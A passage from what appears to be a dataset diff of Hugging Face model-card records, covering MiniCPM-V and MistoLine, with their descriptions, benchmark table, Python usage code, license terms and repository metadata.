lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00002.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='modeling_minicpm.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='modeling_minicpmv.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='modeling_visrag_ret.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='resampler.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [""tcy6/VisRAG_Pipeline""], ""safetensors"": {""parameters"": {""BF16"": 3434965792}, ""total"": 3434965792}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-11-04 13:12:45+00:00"", ""cardData"": ""base_model:\n- openbmb/MiniCPM-V-2\ndatasets:\n- openbmb/VisRAG-Ret-Train-In-domain-data\n- openbmb/VisRAG-Ret-Train-Synthetic-data\nlanguage:\n- en\nlicense: apache-2.0\npipeline_tag: feature-extraction\ntags:\n- VisRAG"", ""transformersInfo"": null, ""_id"": ""670d64c75759c2c673faeaca"", ""modelId"": ""openbmb/VisRAG-Ret"", 
""usedStorage"": 6872003633}",1,,0,,0,,0,,0,"huggingface/InferenceSupport/discussions/new?title=openbmb/VisRAG-Ret&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bopenbmb%2FVisRAG-Ret%5D(%2Fopenbmb%2FVisRAG-Ret)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, tcy6/VisRAG_Pipeline",2
|
MiniCPM-V_finetunes_20250427_003734.csv_finetunes_20250427_003734.csv
ADDED
|
@@ -0,0 +1,189 @@
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
openbmb/MiniCPM-V,"---
|
| 3 |
+
pipeline_tag: visual-question-answering
|
| 4 |
+
---
|
| 5 |
+
|
| 6 |
+
## MiniCPM-V
|
| 7 |
+
### News
|
| 8 |
+
- [2025.01.14] 🔥🔥 We open-source [**MiniCPM-o 2.6**](https://huggingface.co/openbmb/MiniCPM-o-2_6), which delivers a significant performance improvement over **MiniCPM-V 2.6** and supports real-time speech-to-speech conversation and multimodal live streaming. Try it now.
|
| 9 |
+
- [2024.08.06] 🔥 We open-source [**MiniCPM-V 2.6**](https://huggingface.co/openbmb/MiniCPM-V-2_6), which outperforms GPT-4V on single-image, multi-image, and video understanding. It advances the popular features of MiniCPM-Llama3-V 2.5 and can support real-time video understanding on iPad.
|
| 10 |
+
- [2024.05.20] 🔥 GPT-4V level multimodal model [**MiniCPM-Llama3-V 2.5**](https://huggingface.co/openbmb/MiniCPM-Llama3-V-2_5) is out.
|
| 11 |
+
- [2024.04.11] 🔥 [**MiniCPM-V 2.0**](https://huggingface.co/openbmb/MiniCPM-V-2) is out.
|
| 12 |
+
|
| 13 |
+
|
| 14 |
+
**MiniCPM-V** (i.e., OmniLMM-3B) is an efficient model with promising performance for deployment. It is built on SigLip-400M and [MiniCPM-2.4B](https://github.com/OpenBMB/MiniCPM/), connected by a perceiver resampler. Notable features of OmniLMM-3B include:
|
| 15 |
+
|
| 16 |
+
- ⚡️ **High Efficiency.**
|
| 17 |
+
|
| 18 |
+
MiniCPM-V can be **efficiently deployed on most GPU cards and personal computers**, and **even on end devices such as mobile phones**. For visual encoding, we compress the image representations into 64 tokens via a perceiver resampler, significantly fewer than in other LMMs based on MLP architectures (typically > 512 tokens). This allows OmniLMM-3B to operate with **much lower memory cost and higher speed during inference** (a toy sketch of the resampler idea appears after this feature list).
|
| 19 |
+
|
| 20 |
+
- 🔥 **Promising Performance.**
|
| 21 |
+
|
| 22 |
+
MiniCPM-V achieves **state-of-the-art performance** on multiple benchmarks (including MMMU, MME, and MMBench) among models of comparable size, surpassing existing LMMs built on Phi-2. It even **achieves comparable or better performance than the 9.6B Qwen-VL-Chat**.
|
| 23 |
+
|
| 24 |
+
- 🙌 **Bilingual Support.**
|
| 25 |
+
|
| 26 |
+
MiniCPM-V is **the first end-deployable LMM supporting bilingual multimodal interaction in English and Chinese**. This is achieved by generalizing multimodal capabilities across languages, a technique from the ICLR 2024 spotlight [paper](https://arxiv.org/abs/2308.12038).
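A toy sketch of the perceiver-resampler idea referenced above: a fixed set of learned queries cross-attends over the variable-length patch features, so the LLM always sees 64 tokens. The module names and dimensions below are illustrative assumptions, not the exact MiniCPM-V implementation:

```python
import torch
import torch.nn as nn

class PerceiverResampler(nn.Module):
    # Compress a variable number of image patch tokens into a fixed set of
    # 64 latent tokens via cross-attention (illustrative sketch only).
    def __init__(self, dim=1152, num_queries=64, num_heads=8):
        super().__init__()
        # 64 learned query vectors; they attend over the image features
        self.queries = nn.Parameter(torch.randn(num_queries, dim))
        self.attn = nn.MultiheadAttention(dim, num_heads, batch_first=True)
        self.norm = nn.LayerNorm(dim)

    def forward(self, image_feats):  # image_feats: (batch, n_patches, dim)
        b = image_feats.size(0)
        q = self.queries.unsqueeze(0).expand(b, -1, -1)
        out, _ = self.attn(q, image_feats, image_feats)
        return self.norm(out)        # (batch, 64, dim) regardless of n_patches

feats = torch.randn(1, 729, 1152)         # e.g., 729 patch tokens from the encoder
print(PerceiverResampler()(feats).shape)  # torch.Size([1, 64, 1152])
```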
|
| 27 |
+
|
| 28 |
+
### Evaluation
|
| 29 |
+
|
| 30 |
+
<div align=""center"">
|
| 31 |
+
|
| 32 |
+
<table style=""margin: 0px auto;"">
|
| 33 |
+
<thead>
|
| 34 |
+
<tr>
|
| 35 |
+
<th align=""left"">Model</th>
|
| 36 |
+
<th>Size</th>
|
| 37 |
+
<th>MME</th>
|
| 38 |
+
<th nowrap=""nowrap"" >MMB dev (en)</th>
|
| 39 |
+
<th nowrap=""nowrap"" >MMB dev (zh)</th>
|
| 40 |
+
<th nowrap=""nowrap"" >MMMU val</th>
|
| 41 |
+
<th nowrap=""nowrap"" >CMMMU val</th>
|
| 42 |
+
</tr>
|
| 43 |
+
</thead>
|
| 44 |
+
<tbody align=""center"">
|
| 45 |
+
<tr>
|
| 46 |
+
<td align=""left"">LLaVA-Phi</td>
|
| 47 |
+
<td align=""right"">3.0B</td>
|
| 48 |
+
<td>1335</td>
|
| 49 |
+
<td>59.8</td>
|
| 50 |
+
<td>- </td>
|
| 51 |
+
<td>- </td>
|
| 52 |
+
<td>- </td>
|
| 53 |
+
</tr>
|
| 54 |
+
<tr>
|
| 55 |
+
<td nowrap=""nowrap"" align=""left"">MobileVLM</td>
|
| 56 |
+
<td align=""right"">3.0B</td>
|
| 57 |
+
<td>1289</td>
|
| 58 |
+
<td>59.6</td>
|
| 59 |
+
<td>- </td>
|
| 60 |
+
<td>- </td>
|
| 61 |
+
<td>- </td>
|
| 62 |
+
</tr>
|
| 63 |
+
<tr>
|
| 64 |
+
<td nowrap=""nowrap"" align=""left"" >Imp-v1</td>
|
| 65 |
+
<td align=""right"">3B</td>
|
| 66 |
+
<td>1434</td>
|
| 67 |
+
<td>66.5</td>
|
| 68 |
+
<td>- </td>
|
| 69 |
+
<td>- </td>
|
| 70 |
+
<td>- </td>
|
| 71 |
+
</tr>
|
| 72 |
+
<tr>
|
| 73 |
+
<td nowrap=""nowrap"" align=""left"" >Qwen-VL-Chat</td>
|
| 74 |
+
<td align=""right"" >9.6B</td>
|
| 75 |
+
<td>1487</td>
|
| 76 |
+
<td>60.6 </td>
|
| 77 |
+
<td>56.7 </td>
|
| 78 |
+
<td>35.9 </td>
|
| 79 |
+
<td>30.7 </td>
|
| 80 |
+
</tr>
|
| 81 |
+
<tr>
|
| 82 |
+
<td nowrap=""nowrap"" align=""left"" >CogVLM</td>
|
| 83 |
+
<td align=""right"">17.4B </td>
|
| 84 |
+
<td>1438 </td>
|
| 85 |
+
<td>63.7 </td>
|
| 86 |
+
<td>53.8 </td>
|
| 87 |
+
<td>32.1 </td>
|
| 88 |
+
<td>- </td>
|
| 89 |
+
</tr>
|
| 90 |
+
<tr>
|
| 91 |
+
<td nowrap=""nowrap"" align=""left"" ><b>MiniCPM-V</b></td>
|
| 92 |
+
<td align=""right"">3B </td>
|
| 93 |
+
<td>1452 </td>
|
| 94 |
+
<td>67.9 </td>
|
| 95 |
+
<td>65.3 </td>
|
| 96 |
+
<td>37.2 </td>
|
| 97 |
+
<td>32.1 </td>
|
| 98 |
+
</tr>
|
| 99 |
+
</tbody>
|
| 100 |
+
</table>
|
| 101 |
+
|
| 102 |
+
</div>
|
| 103 |
+
|
| 104 |
+
|
| 105 |
+
### Examples
|
| 106 |
+
<div align=""center"">
|
| 107 |
+
<table>
|
| 108 |
+
<tr>
|
| 109 |
+
<td>
|
| 110 |
+
<p>
|
| 111 |
+
<img src=""assets/Mushroom_en.gif"" width=""400""/>
|
| 112 |
+
</p>
|
| 113 |
+
</td>
|
| 114 |
+
<td>
|
| 115 |
+
<p>
|
| 116 |
+
<img src=""assets/Snake_en.gif"" width=""400""/>
|
| 117 |
+
</p>
|
| 118 |
+
</td>
|
| 119 |
+
</tr>
|
| 120 |
+
</table>
|
| 121 |
+
</div>
|
| 122 |
+
|
| 123 |
+
|
| 124 |
+
## Demo
|
| 125 |
+
Click here to try out the Demo of [MiniCPM-V](http://120.92.209.146:80).
|
| 126 |
+
|
| 127 |
+
## Deployment on Mobile Phone
|
| 128 |
+
Currently, MiniCPM-V (i.e., OmniLMM-3B) can be deployed on mobile phones running Android and HarmonyOS. 🚀 Try it out [here](https://github.com/OpenBMB/mlc-MiniCPM).
|
| 129 |
+
|
| 130 |
+
|
| 131 |
+
## Usage
|
| 132 |
+
Inference using Hugging Face Transformers on Nvidia GPUs or a Mac with MPS (Apple silicon or AMD GPUs). Requirements were tested on Python 3.10:
|
| 133 |
+
```
|
| 134 |
+
Pillow==10.1.0
|
| 135 |
+
timm==0.9.10
|
| 136 |
+
torch==2.1.2
|
| 137 |
+
torchvision==0.16.2
|
| 138 |
+
transformers==4.36.0
|
| 139 |
+
sentencepiece==0.1.99
|
| 140 |
+
```
|
| 141 |
+
|
| 142 |
+
```python
|
| 143 |
+
# test.py
|
| 144 |
+
import torch
|
| 145 |
+
from PIL import Image
|
| 146 |
+
from transformers import AutoModel, AutoTokenizer
|
| 147 |
+
|
| 148 |
+
model = AutoModel.from_pretrained('openbmb/MiniCPM-V', trust_remote_code=True, torch_dtype=torch.bfloat16)
|
| 149 |
+
# For Nvidia GPUs that support BF16 (e.g., A100, H100, RTX 3090)
|
| 150 |
+
model = model.to(device='cuda', dtype=torch.bfloat16)
|
| 151 |
+
# For Nvidia GPUs that do NOT support BF16 (e.g., V100, T4, RTX 2080)
|
| 152 |
+
#model = model.to(device='cuda', dtype=torch.float16)
|
| 153 |
+
# For Mac with MPS (Apple silicon or AMD GPUs).
|
| 154 |
+
# Run with `PYTORCH_ENABLE_MPS_FALLBACK=1 python test.py`
|
| 155 |
+
#model = model.to(device='mps', dtype=torch.float16)
|
| 156 |
+
|
| 157 |
+
tokenizer = AutoTokenizer.from_pretrained('openbmb/MiniCPM-V', trust_remote_code=True)
|
| 158 |
+
model.eval()
|
| 159 |
+
|
| 160 |
+
image = Image.open('xx.jpg').convert('RGB')
|
| 161 |
+
question = 'What is in the image?'
|
| 162 |
+
msgs = [{'role': 'user', 'content': question}]
|
| 163 |
+
|
| 164 |
+
res, context, _ = model.chat(
|
| 165 |
+
image=image,
|
| 166 |
+
msgs=msgs,
|
| 167 |
+
context=None,
|
| 168 |
+
tokenizer=tokenizer,
|
| 169 |
+
sampling=True,
|
| 170 |
+
temperature=0.7
|
| 171 |
+
)
|
| 172 |
+
print(res)
|
| 173 |
+
```
|
| 174 |
+
|
| 175 |
+
Please see [GitHub](https://github.com/OpenBMB/OmniLMM) for more details about usage.
|
| 176 |
+
|
| 177 |
+
## License
|
| 178 |
+
|
| 179 |
+
#### Model License
|
| 180 |
+
* The code in this repo is released under the [Apache-2.0](https://github.com/OpenBMB/MiniCPM/blob/main/LICENSE) License.
|
| 181 |
+
* The usage of MiniCPM-V series model weights must strictly follow [MiniCPM Model License.md](https://github.com/OpenBMB/MiniCPM/blob/main/MiniCPM%20Model%20License.md).
|
| 182 |
+
* The models and weights of MiniCPM are completely free for academic research. After filling out a [""questionnaire""](https://modelbest.feishu.cn/share/base/form/shrcnpV5ZT9EJ6xYjh3Kx0J6v8g) for registration, they are also available for free commercial use.
|
| 183 |
+
|
| 184 |
+
|
| 185 |
+
#### Statement
|
| 186 |
+
* As an LLM, MiniCPM-V generates content by learning from a large amount of text, but it cannot comprehend, express personal opinions, or make value judgments. Anything generated by MiniCPM-V does not represent the views and positions of the model developers.
|
| 187 |
+
* We will not be liable for any problems arising from the use of the MiniCPM-V open-source model, including but not limited to data security issues, public-opinion risks, or any risks and problems arising from the misdirection, misuse, or improper dissemination of the model.
|
| 188 |
+
|
| 189 |
+
","{""id"": ""openbmb/MiniCPM-V"", ""author"": ""openbmb"", ""sha"": ""7cf70e2964c456f423666e2c183bcd4c87f4fd4b"", ""last_modified"": ""2025-01-15 10:37:49+00:00"", ""created_at"": ""2024-01-30 14:38:14+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 20935, ""downloads_all_time"": null, ""likes"": 173, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""minicpmv"", ""feature-extraction"", ""visual-question-answering"", ""custom_code"", ""arxiv:2308.12038"", ""region:us""], ""pipeline_tag"": ""visual-question-answering"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""pipeline_tag: visual-question-answering"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""MiniCPMV""], ""auto_map"": {""AutoConfig"": ""configuration_minicpm.MiniCPMVConfig"", ""AutoModel"": ""modeling_minicpmv.MiniCPMV"", ""AutoModelForCausalLM"": ""modeling_minicpmv.MiniCPMV""}, ""model_type"": ""minicpmv"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""eos_token"": ""</s>"", ""pad_token"": null, ""unk_token"": ""<unk>"", ""use_default_system_prompt"": false}}, ""transformers_info"": {""auto_model"": ""AutoModel"", ""custom_class"": ""modeling_minicpmv.MiniCPMV"", ""pipeline_tag"": ""feature-extraction"", ""processor"": null}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/Mushroom_en.gif', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/Snake_en.gif', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/\u8611\u83c7_cn.gif', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/\u86c7_cn.gif', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='configuration_minicpm.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00002.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00002.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='modeling_minicpm.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='modeling_minicpmv.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='resampler.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [""Demo750/XGBoost_Gaze"", ""mohan007/autism_exp_with_minicpm_o_2_6"", ""AhmedAlmaghz/github-repo-test"", ""ManishThota/GSoC-Super-Rapid-Annotator"", ""Jeel05/large-model-space"", ""ABharatSai/PicQ"", ""DHEIVER/openbmb-MiniCPM-o-2_6"", ""ragavendran-r/MiniCPM-test""], ""safetensors"": {""parameters"": {""BF16"": 3434965792}, ""total"": 3434965792}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-01-15 10:37:49+00:00"", ""cardData"": ""pipeline_tag: visual-question-answering"", ""transformersInfo"": {""auto_model"": 
""AutoModel"", ""custom_class"": ""modeling_minicpmv.MiniCPMV"", ""pipeline_tag"": ""feature-extraction"", ""processor"": null}, ""_id"": ""65b909d6dd94007789899683"", ""modelId"": ""openbmb/MiniCPM-V"", ""usedStorage"": 6878474344}",0,,0,,0,,0,,0,"ABharatSai/PicQ, AhmedAlmaghz/github-repo-test, DHEIVER/openbmb-MiniCPM-o-2_6, Demo750/XGBoost_Gaze, Jeel05/large-model-space, ManishThota/GSoC-Super-Rapid-Annotator, huggingface/InferenceSupport/discussions/new?title=openbmb/MiniCPM-V&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bopenbmb%2FMiniCPM-V%5D(%2Fopenbmb%2FMiniCPM-V)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, mohan007/autism_exp_with_minicpm_o_2_6, ragavendran-r/MiniCPM-test",9
|
MistoLine_finetunes_20250425_165642.csv_finetunes_20250425_165642.csv
ADDED
|
@@ -0,0 +1,172 @@
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
TheMistoAI/MistoLine,"---
|
| 3 |
+
license: openrail++
|
| 4 |
+
tags:
|
| 5 |
+
- art
|
| 6 |
+
- stable diffusion
|
| 7 |
+
- ControlNet
|
| 8 |
+
- SDXL
|
| 9 |
+
- Diffusion-XL
|
| 10 |
+
pipeline_tag: text-to-image
|
| 11 |
+
---
|
| 12 |
+
# MistoLine
|
| 13 |
+
## Control Every Line!
|
| 14 |
+
|
| 15 |
+

|
| 16 |
+
[GitHub Repo](https://github.com/TheMistoAI/MistoLine)
|
| 17 |
+
|
| 18 |
+
## NEWS!!! The Anyline preprocessor is released!!!
|
| 19 |
+
[Anyline Repo](https://github.com/TheMistoAI/ComfyUI-Anyline)
|
| 20 |
+
|
| 21 |
+
**MistoLine: A Versatile and Robust SDXL-ControlNet Model for Adaptable Line Art Conditioning.**
|
| 22 |
+
|
| 23 |
+
MistoLine is an SDXL-ControlNet model that can adapt to any type of line art input, demonstrating high accuracy and excellent stability. It can generate high-quality images (with a short side greater than 1024px) based on user-provided line art of various types, including hand-drawn sketches, different ControlNet line preprocessors, and model-generated outlines. MistoLine eliminates the need to select different ControlNet models for different line preprocessors, as it exhibits strong generalization capabilities across diverse line art conditions.
|
| 24 |
+
|
| 25 |
+
We developed MistoLine by employing a novel line preprocessing algorithm, **[Anyline](https://github.com/TheMistoAI/ComfyUI-Anyline)**, and retraining the ControlNet model based on the UNet of stabilityai/stable-diffusion-xl-base-1.0, along with innovations in large-model training engineering. MistoLine showcases superior performance across
|
| 26 |
+
different types of line art inputs, surpassing existing ControlNet models in terms of detail restoration, prompt alignment, and stability, particularly in more complex scenarios.
|
| 27 |
+
|
| 28 |
+
MistoLine maintains consistency with the ControlNet architecture released by @lllyasviel, as illustrated in the following schematic diagram:
|
| 29 |
+

|
| 30 |
+

|
| 31 |
+
*Reference: https://github.com/lllyasviel/ControlNet*
|
| 32 |
+
|
| 33 |
+
More information about ControlNet can be found in the following references:
|
| 34 |
+
https://github.com/lllyasviel/ControlNet
|
| 35 |
+
https://huggingface.co/docs/diffusers/main/en/api/pipelines/controlnet_sdxl
|
| 36 |
+
|
| 37 |
+
The model is compatible with most SDXL models, except for PlaygroundV2.5, CosXL, and possibly SDXL-Lightning. It can be used in conjunction with LCM and other ControlNet models.
|
| 38 |
+
|
| 39 |
+
The following usage of this model is not allowed:
|
| 40 |
+
* Violating laws and regulations
|
| 41 |
+
* Harming or exploiting minors
|
| 42 |
+
* Creating and spreading false information
|
| 43 |
+
* Infringing on others' privacy
|
| 44 |
+
* Defaming or harassing others
|
| 45 |
+
* Automated decision-making that harms others' legal rights
|
| 46 |
+
* Discrimination based on social behavior or personal characteristics
|
| 47 |
+
* Exploiting the vulnerabilities of specific groups to mislead their behavior
|
| 48 |
+
* Discrimination based on legally protected characteristics
|
| 49 |
+
* Providing medical advice and diagnostic results
|
| 50 |
+
* Improperly generating and using information for purposes such as law enforcement and immigration
|
| 51 |
+
|
| 52 |
+
If you use or distribute this model for commercial purposes, you must comply with the following conditions:
|
| 53 |
+
1. Clearly acknowledge the contribution of TheMisto.ai to this model in the documentation, website, or other prominent and visible locations of your product.
|
| 54 |
+
Example: ""This product uses the MistoLine-SDXL-ControlNet developed by TheMisto.ai.""
|
| 55 |
+
2. If your product includes about screens, readme files, or other similar display areas, you must include the above attribution information in those areas.
|
| 56 |
+
3. If your product does not have the aforementioned areas, you must include the attribution information in other reasonable locations within the product to ensure that end-users can notice it.
|
| 57 |
+
4. You must not imply in any way that TheMisto.ai endorses or promotes your product. The use of the attribution information is solely to indicate the origin of this model.
|
| 58 |
+
If you have any questions about how to provide attribution in specific cases, please contact info@themisto.ai.
|
| 59 |
+
|
| 60 |
+
Attribution Terms
|
| 61 |
+
If you use or distribute this model for commercial purposes, you must meet the following conditions:
|
| 62 |
+
1. Clearly mention TheMisto.ai's contribution to this software in the product's documentation, website, or other prominent and visible locations.
|
| 63 |
+
示例: ""本产品使用了 TheMisto.ai 开发的 MistoLine-SDXL-ControlNet。""
|
| 64 |
+
2. If your product includes about screens, readme files, or other similar display areas, you must include the above attribution information in those areas.
|
| 65 |
+
3. If your product does not have the aforementioned areas, you must include the attribution information in other reasonable locations within the product so that end users can notice it.
|
| 66 |
+
4. You must not imply in any way that TheMisto.ai endorses or promotes your product. The use of the attribution information is solely to indicate the origin of this model.
|
| 67 |
+
If you have any questions about how to provide attribution in specific cases, please contact info@themisto.ai.
|
| 68 |
+
|
| 69 |
+
The model output is not censored and the authors do not endorse the opinions in the generated content. Use at your own risk.
|
| 70 |
+
|
| 71 |
+
## Apply with Different Line Preprocessors
|
| 72 |
+

|
| 73 |
+
|
| 74 |
+
## Compare with Other ControlNets
|
| 75 |
+

|
| 76 |
+
|
| 77 |
+
## Application Examples
|
| 78 |
+
|
| 79 |
+
### Sketch Rendering
|
| 80 |
+
*The following case only utilized MistoLine as the controlnet:*
|
| 81 |
+

|
| 82 |
+
|
| 83 |
+
### Model Rendering
|
| 84 |
+
*The following case only utilized Anyline as the preprocessor and MistoLine as the controlnet.*
|
| 85 |
+

|
| 86 |
+
|
| 87 |
+
## ComfyUI Recommended Parameters
|
| 88 |
+
```
|
| 89 |
+
sampler steps:30
|
| 90 |
+
CFG:7.0
|
| 91 |
+
sampler_name:dpmpp_2m_sde
|
| 92 |
+
scheduler:karras
|
| 93 |
+
denoise:0.93
|
| 94 |
+
controlnet_strength:1.0
|
| 95 |
+
start_percent:0.0
|
| 96 |
+
end_percent:0.9
|
| 97 |
+
```
|
| 98 |
+
## Diffusers pipeline
|
| 99 |
+
Make sure to first install the libraries:
|
| 100 |
+
```
|
| 101 |
+
pip install accelerate transformers safetensors opencv-python diffusers
|
| 102 |
+
```
|
| 103 |
+
And then we're ready to go:
|
| 104 |
+
```python
|
| 105 |
+
from diffusers import ControlNetModel, StableDiffusionXLControlNetPipeline, AutoencoderKL
|
| 106 |
+
from diffusers.utils import load_image
|
| 107 |
+
from PIL import Image
|
| 108 |
+
import torch
|
| 109 |
+
import numpy as np
|
| 110 |
+
import cv2
|
| 111 |
+
|
| 112 |
+
prompt = ""aerial view, a futuristic research complex in a bright foggy jungle, hard lighting""
|
| 113 |
+
negative_prompt = 'low quality, bad quality, sketches'
|
| 114 |
+
|
| 115 |
+
image = load_image(""https://huggingface.co/datasets/hf-internal-testing/diffusers-images/resolve/main/sd_controlnet/hf-logo.png"")
|
| 116 |
+
|
| 117 |
+
controlnet_conditioning_scale = 0.5
|
| 118 |
+
|
| 119 |
+
controlnet = ControlNetModel.from_pretrained(
|
| 120 |
+
""TheMistoAI/MistoLine"",
|
| 121 |
+
torch_dtype=torch.float16,
|
| 122 |
+
variant=""fp16"",
|
| 123 |
+
)
|
| 124 |
+
vae = AutoencoderKL.from_pretrained(""madebyollin/sdxl-vae-fp16-fix"", torch_dtype=torch.float16)
|
| 125 |
+
pipe = StableDiffusionXLControlNetPipeline.from_pretrained(
|
| 126 |
+
""stabilityai/stable-diffusion-xl-base-1.0"",
|
| 127 |
+
controlnet=controlnet,
|
| 128 |
+
vae=vae,
|
| 129 |
+
torch_dtype=torch.float16,
|
| 130 |
+
)
|
| 131 |
+
pipe.enable_model_cpu_offload()
|
| 132 |
+
|
| 133 |
+
image = np.array(image)
|
| 134 |
+
image = cv2.Canny(image, 100, 200)
|
| 135 |
+
image = image[:, :, None]
|
| 136 |
+
image = np.concatenate([image, image, image], axis=2)
|
| 137 |
+
image = Image.fromarray(image)
|
| 138 |
+
|
| 139 |
+
images = pipe(
|
| 140 |
+
prompt, negative_prompt=negative_prompt, image=image, controlnet_conditioning_scale=controlnet_conditioning_scale,
|
| 141 |
+
).images
|
| 142 |
+
|
| 143 |
+
images[0].save(""hug_lab.png"")
|
| 144 |
+
```
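To apply the ComfyUI parameters recommended earlier with this Diffusers pipeline, roughly equivalent arguments exist on the pipeline call. A hedged mapping, reusing `pipe`, `prompt`, `negative_prompt`, and `image` from the example above (note that `denoise` has no direct text-to-image equivalent; it corresponds to img2img strength):

```python
# Approximate Diffusers equivalents of the ComfyUI settings recommended above.
images = pipe(
    prompt,
    negative_prompt=negative_prompt,
    image=image,
    num_inference_steps=30,             # sampler steps: 30
    guidance_scale=7.0,                 # CFG: 7.0
    controlnet_conditioning_scale=1.0,  # controlnet_strength: 1.0
    control_guidance_start=0.0,         # start_percent: 0.0
    control_guidance_end=0.9,           # end_percent: 0.9
).images
```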
|
| 145 |
+
|
| 146 |
+
|
| 147 |
+
## Checkpoints
|
| 148 |
+
* mistoLine_rank256.safetensors : General usage version, for ComfyUI and AUTOMATIC1111-WebUI.
|
| 149 |
+
* mistoLine_fp16.safetensors : FP16 weights, for ComfyUI and AUTOMATIC1111-WebUI.
|
| 150 |
+
|
| 151 |
+
## !!! mistoLine_rank256.safetensors performs better than mistoLine_fp16.safetensors !!!
|
| 152 |
+
## !!! mistoLine_rank256.safetensors performs better !!!
|
| 153 |
+
|
| 154 |
+
## ComfyUI Usage
|
| 155 |
+

|
| 156 |
+
|
| 157 |
+
## Convenient download link for China (mainland):
|
| 158 |
+
Link: https://pan.baidu.com/s/1DbZWmGJ40Uzr3Iz9RNBG_w?pwd=8mzs
|
| 159 |
+
Extraction code: 8mzs
|
| 160 |
+
|
| 161 |
+
## Citation
|
| 162 |
+
```
|
| 163 |
+
@misc{zhang2023adding,
|
| 164 |
+
title={Adding Conditional Control to Text-to-Image Diffusion Models},
|
| 165 |
+
author={Lvmin Zhang and Anyi Rao and Maneesh Agrawala},
|
| 166 |
+
year={2023},
|
| 167 |
+
eprint={2302.05543},
|
| 168 |
+
archivePrefix={arXiv},
|
| 169 |
+
primaryClass={cs.CV}
|
| 170 |
+
}
|
| 171 |
+
```
|
| 172 |
+
","{""id"": ""TheMistoAI/MistoLine"", ""author"": ""TheMistoAI"", ""sha"": ""344915650d49be75168c2c20e67bb18cb4341ae3"", ""last_modified"": ""2024-05-17 12:17:27+00:00"", ""created_at"": ""2024-05-07 10:15:16+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 12515, ""downloads_all_time"": null, ""likes"": 438, ""library_name"": ""diffusers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""diffusers"", ""art"", ""stable diffusion"", ""ControlNet"", ""SDXL"", ""Diffusion-XL"", ""text-to-image"", ""arxiv:2302.05543"", ""license:openrail++"", ""region:us""], ""pipeline_tag"": ""text-to-image"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""license: openrail++\npipeline_tag: text-to-image\ntags:\n- art\n- stable diffusion\n- ControlNet\n- SDXL\n- Diffusion-XL"", ""widget_data"": null, ""model_index"": null, ""config"": {}, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Anyline/MTEED.pth', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='LICENSE.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/comfyui.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/comparison.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/controlnet_1.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/controlnet_2.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/intro.png', size=None, 